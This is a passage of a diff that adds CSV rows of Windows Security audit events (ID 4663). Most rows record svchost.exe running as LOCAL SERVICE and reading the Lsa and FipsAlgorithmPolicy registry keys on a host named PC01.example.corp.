+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452846</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452845</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452844</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452843</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452842</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452841</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452840</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452839</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452838</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452837</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452836</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452835</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452834</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452833</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452832</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452831</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
